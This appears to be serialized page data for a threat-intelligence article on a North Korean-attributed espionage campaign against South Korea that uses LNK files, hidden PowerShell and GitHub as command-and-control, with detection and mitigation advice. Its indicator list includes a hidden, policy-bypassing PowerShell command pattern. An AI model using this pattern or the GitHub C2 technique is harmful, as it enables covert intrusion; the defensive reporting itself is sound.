[{"data":1,"prerenderedAt":151},["ShallowReactive",2],{"article-slug-north-korean-hackers-use-github-as-c2-in-south-korea-campaign":3,"articles-index":-1},{"id":4,"slug":5,"headline":6,"title":7,"summary":8,"full_report":9,"twitter_post":10,"meta_description":11,"category":12,"severity":16,"entities":17,"cves":41,"sources":42,"events":58,"mitre_techniques":59,"mitre_mitigations":78,"d3fend_countermeasures":102,"iocs":111,"cyber_observables":112,"tags":134,"extract_datetime":140,"article_type":141,"impact_scope":142,"pub_date":149,"reading_time_minutes":150,"createdAt":140,"updatedAt":140},"d5e9de05-1d5d-43e0-a966-33532a3c516f","north-korean-hackers-use-github-as-c2-in-south-korea-campaign","North Korean Hackers Abuse GitHub for C2 in Campaign Targeting South Korea","North Korean Actors Use GitHub as Covert C2 in LNK-Based Malware Campaign","A sophisticated, multi-stage phishing campaign attributed to North Korean state-sponsored actors is targeting organizations in South Korea. The attackers use malicious Windows shortcut (LNK) files disguised as business documents to deliver a PowerShell-based payload. A key feature of the campaign is the abuse of GitHub as a command-and-control (C2) channel, allowing the malware to exfiltrate data and receive commands by communicating with attacker-controlled repositories. This tactic helps the malicious traffic blend in with legitimate web activity, evading detection. The campaign shows links to known North Korean groups like Kimsuky and Lazarus.","## Executive Summary\n\nSecurity researchers have identified an ongoing, stealthy malware campaign targeting organizations in South Korea, with strong evidence linking it to North Korean state-sponsored threat actors such as **[Kimsuky](https://attack.mitre.org/groups/G0094/)** and **[Lazarus Group](https://attack.mitre.org/groups/G0032/)**. The campaign leverages malicious Windows shortcut (`.lnk`) files, often delivered via phishing, as the initial infection vector. Upon execution, a hidden **[PowerShell](https://attack.mitre.org/techniques/T1059/001/)** script is run, which uses **[GitHub](https://github.com/)** as a command-and-control (C2) platform. By abusing the legitimate and widely trusted GitHub service, the attackers' C2 communications are effectively camouflaged within normal network traffic, making detection extremely difficult. The ultimate goal of the campaign appears to be espionage and long-term intelligence gathering.\n\n---\n\n## Threat Overview\n\n**Attribution:** Suspected North Korean state-sponsored groups (Kimsuky, APT37, Lazarus).\n\nThis campaign demonstrates the continuing evolution of North Korean TTPs, focusing on stealth and the abuse of legitimate services:\n\n- **Initial Access:** The use of malicious LNK files ([`T1204.002 - Malicious File`](https://attack.mitre.org/techniques/T1204/002/)) delivered via phishing. These files are disguised with icons and names of common document types (e.g., PDFs) to trick users.\n- **Execution:** The LNK file contains obfuscated commands that launch a PowerShell script to perform the main malicious activities.\n- **Command and Control:** The most notable feature is the use of GitHub as a C2 channel ([`T1102.002 - Web Service`](https://attack.mitre.org/techniques/T1102/002/)). The PowerShell script communicates with attacker-controlled GitHub repositories, posting stolen data and pulling down new commands or payloads. This is a form of 'Living off the Trusted Site' (LOTS).\n- **Defense Evasion:** By using PowerShell and GitHub, the attack minimizes its footprint on the infected system and makes its network traffic appear benign to most security solutions.\n\n---\n\n## Technical Analysis\n\nThe attack unfolds in several stages:\n\n1.  **Delivery:** A user receives a malicious LNK file, likely as an email attachment or a download from a compromised site.\n2.  **Execution:** The user clicks the LNK file. The file is configured to execute a PowerShell command hidden in its 'Target' properties. To maintain the guise, it also opens a legitimate-looking decoy document.\n3.  **C2 Communication:** The PowerShell script collects initial system information (e.g., hostname, username, IP address). It then makes API calls to GitHub, often creating or updating a file in a public or private repository controlled by the attacker, with the collected information encoded within.\n4.  **Tasking:** The script periodically polls the GitHub repository for new instructions. The attacker can update a file in the repository with new PowerShell commands, which the implant will then download and execute.\n5.  **Payload Delivery:** This C2 channel can be used to download further malware, such as Remote Access Trojans (RATs) like XenoRAT, for long-term control and more extensive data theft.\n\nRecent versions of the malware have shown increased obfuscation, removing metadata that previously linked them to North Korean actors and hiding C2 instructions more deeply within the LNK file's arguments.\n\n---\n\n## Impact Assessment\n\nThe primary goal of this campaign is espionage. By gaining a persistent foothold within South Korean organizations, the attackers can:\n\n- Collect political, military, and economic intelligence.\n- Steal intellectual property and sensitive corporate data.\n- Monitor communications of targeted individuals.\n- Use the compromised networks as a launchpad for further attacks.\n\nWhile not financially destructive in the way ransomware is, the long-term strategic damage from such intelligence gathering can be immense.\n\n---\n\n## Detection & Response\n\n**Detection Strategies:**\n1.  **PowerShell Logging:** Enable and monitor PowerShell script block logging (Windows Event ID 4104). Look for obfuscated PowerShell commands and scripts that make web requests to `api.github.com`. This is a core component of **[D3FEND Process Analysis](https://d3fend.mitre.org/technique/d3f:ProcessAnalysis)**.\n2.  **Network Traffic Analysis:** While the traffic is encrypted (HTTPS), monitoring DNS queries and creating alerts for processes connecting to `github.com` or `api.github.com` that are not known developer tools or web browsers can be an effective detection method. This is an application of **[D3FEND Network Traffic Analysis](https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis)**.\n3.  **Endpoint Analysis:** Scan for LNK files with unusual target paths, especially those that contain `powershell.exe` or `cmd.exe`. EDR solutions can be configured to alert on the execution of PowerShell from a LNK file shortcut.\n\n**Response Actions:**\n- If detected, block network access to the specific GitHub repositories being used for C2.\n- Isolate the affected endpoint and analyze the PowerShell script to understand its full capabilities and what data may have been exfiltrated.\n- Report the malicious repositories to GitHub for takedown.\n\n---\n\n## Mitigation\n\n1.  **Block LNK Attachments:** Configure email gateways to block or quarantine emails with LNK file attachments, as they have few legitimate use cases in email.\n2.  **Attack Surface Reduction (ASR) Rules:** Enable the ASR rule \"Block execution of potentially obfuscated scripts\" to prevent the execution of the malicious PowerShell.\n3.  **User Training:** Educate users about the dangers of LNK files and to be suspicious of any unexpected document attachments.\n4.  **Restrict PowerShell Execution:** Use PowerShell Constrained Language Mode where possible, which limits the dangerous capabilities that can be invoked by scripts.","North Korean hackers are using GitHub as a covert C2 channel in a new campaign targeting South Korea. The attack uses malicious LNK files to run PowerShell scripts, blending in with legitimate traffic. 🇰🇵 #CyberSecurity #ThreatIntel #NorthKorea #GitHub","North Korean state-sponsored hackers are using malicious LNK files and abusing GitHub as a command-and-control (C2) server in a stealthy espionage campaign targeting South Korea.",[13,14,15],"Threat Actor","Phishing","Cyberattack","high",[18,22,25,28,31,35,38],{"name":19,"type":20,"url":21},"Kimsuky","threat_actor","https://attack.mitre.org/groups/G0094/",{"name":23,"type":20,"url":24},"APT37","https://attack.mitre.org/groups/G0067/",{"name":26,"type":20,"url":27},"Lazarus Group","https://attack.mitre.org/groups/G0032/",{"name":29,"type":30},"GitHub","company",{"name":32,"type":33,"url":34},"PowerShell","technology","https://attack.mitre.org/techniques/T1059/001/",{"name":36,"type":37},"XenoRAT","malware",{"name":39,"type":40},"South Korea","other",[],[43,48,53],{"url":44,"title":45,"friendly_name":46,"website":47},"https://gbhackers.com/github-backed-malware-spread-via-lnk-files-in-south-korea/","GitHub-Backed Malware Spread via LNK Files in South Korea","GBHackers","gbhackers.com",{"url":49,"title":50,"friendly_name":51,"website":52},"https://cyberpress.com/github-hosted-malware-delivered-through-lnk-files-in-south-korea-attack-wave/","GitHub-Hosted Malware Delivered Through LNK Files In South Korea Attack Wave","Cyberpress","cyberpress.com",{"url":54,"title":55,"friendly_name":56,"website":57},"https://www.securityweek.com/north-korea-related-campaign-abuses-github-as-c2-in-new-lnk-phishing-attacks/","North Korea–Related Campaign Abuses GitHub as C2 in New LNK Phishing Attacks","SecurityWeek","securityweek.com",[],[60,64,68,70,74],{"id":61,"name":62,"tactic":63},"T1566.001","Spearphishing Attachment","Initial Access",{"id":65,"name":66,"tactic":67},"T1204.002","Malicious File","Execution",{"id":69,"name":32,"tactic":67},"T1059.001",{"id":71,"name":72,"tactic":73},"T1102.002","Web Service","Command and Control",{"id":75,"name":76,"tactic":77},"T1027","Obfuscated Files or Information","Defense Evasion",[79,89,98],{"id":80,"name":81,"d3fend_techniques":82,"description":87,"domain":88},"M1037","Filter Network Traffic",[83],{"id":84,"name":85,"url":86},"D3-OTF","Outbound Traffic Filtering","https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering","Filter outbound traffic to GitHub at the domain level for non-developer workstations to disrupt the C2 channel.","enterprise",{"id":90,"name":91,"d3fend_techniques":92,"description":97,"domain":88},"M1038","Execution Prevention",[93],{"id":94,"name":95,"url":96},"D3-SCF","System Call Filtering","https://d3fend.mitre.org/technique/d3f:SystemCallFiltering","Use Attack Surface Reduction (ASR) rules and PowerShell Constrained Language Mode to limit the capabilities of malicious scripts.",{"id":99,"name":100,"description":101,"domain":88},"M1017","User Training","Educate users to be suspicious of unexpected attachments, even if they appear to be documents.",[103,105],{"technique_id":84,"technique_name":85,"url":86,"recommendation":104,"mitre_mitigation_id":80},"The core of this attack's evasion is its use of GitHub for C2. While blocking GitHub entirely is not feasible for many organizations, granular outbound traffic filtering can be highly effective. Implement a proxy or firewall policy that restricts which devices can connect to `github.com` and `api.github.com`. For most users and servers, there is no legitimate reason to connect directly to GitHub's API. Limit this access to only developer workstations and build servers. For all other endpoints, block this traffic. This 'deny by default' posture for C2-like web services cripples the malware's ability to receive commands or exfiltrate data, rendering the initial compromise inert.",{"technique_id":106,"technique_name":107,"url":108,"recommendation":109,"mitre_mitigation_id":110},"D3-PSA","PowerShell Script Analysis","https://d3fend.mitre.org/technique/d3f:PowerShellScriptAnalysis","This attack relies on executing obfuscated PowerShell from a LNK file. The key to detection is robust PowerShell logging and analysis. Ensure that PowerShell Script Block Logging (Event ID 4104) and Module Logging (Event ID 4103) are enabled via Group Policy and that these logs are forwarded to your SIEM. This provides the full, de-obfuscated content of any executed script. Create detection rules that look for suspicious script content, such as keywords like `Invoke-WebRequest` or `IWR` paired with connections to `api.github.com`, or scripts that perform system reconnaissance. This allows you to see past the obfuscation and detect the malware's true intent.","M1047",[],[113,118,124,129],{"type":114,"value":115,"description":116,"context":117,"confidence":16},"command_line_pattern","powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden","Common command-line pattern for silently executing a malicious PowerShell script, often found in the target property of a malicious LNK file.","EDR telemetry, Windows Event ID 4688",{"type":119,"value":120,"description":121,"context":122,"confidence":123},"domain","api.github.com","The malware communicates with this domain for C2. Look for non-browser or non-developer tool processes making connections to it.","DNS logs, Web proxy logs, Netflow","medium",{"type":125,"value":126,"description":127,"context":128,"confidence":123},"file_name","*.lnk","The initial infection vector. Monitor for LNK files being created or downloaded in unusual locations (e.g., %TEMP%).","File integrity monitoring, EDR",{"type":130,"value":131,"description":132,"context":133,"confidence":16},"event_id","4104","PowerShell Script Block Logging event ID. This log source provides the full content of executed PowerShell scripts, even if obfuscated.","Windows PowerShell Log, SIEM",[135,19,136,29,137,138,32,139,39],"North Korea","Lazarus","C2","LNK file","espionage","2026-04-06T15:00:00.000Z","Analysis",{"geographic_scope":143,"countries_affected":144,"industries_affected":145},"national",[39],[146,147,148],"Government","Defense","Technology","2026-04-06",5,1775683836148]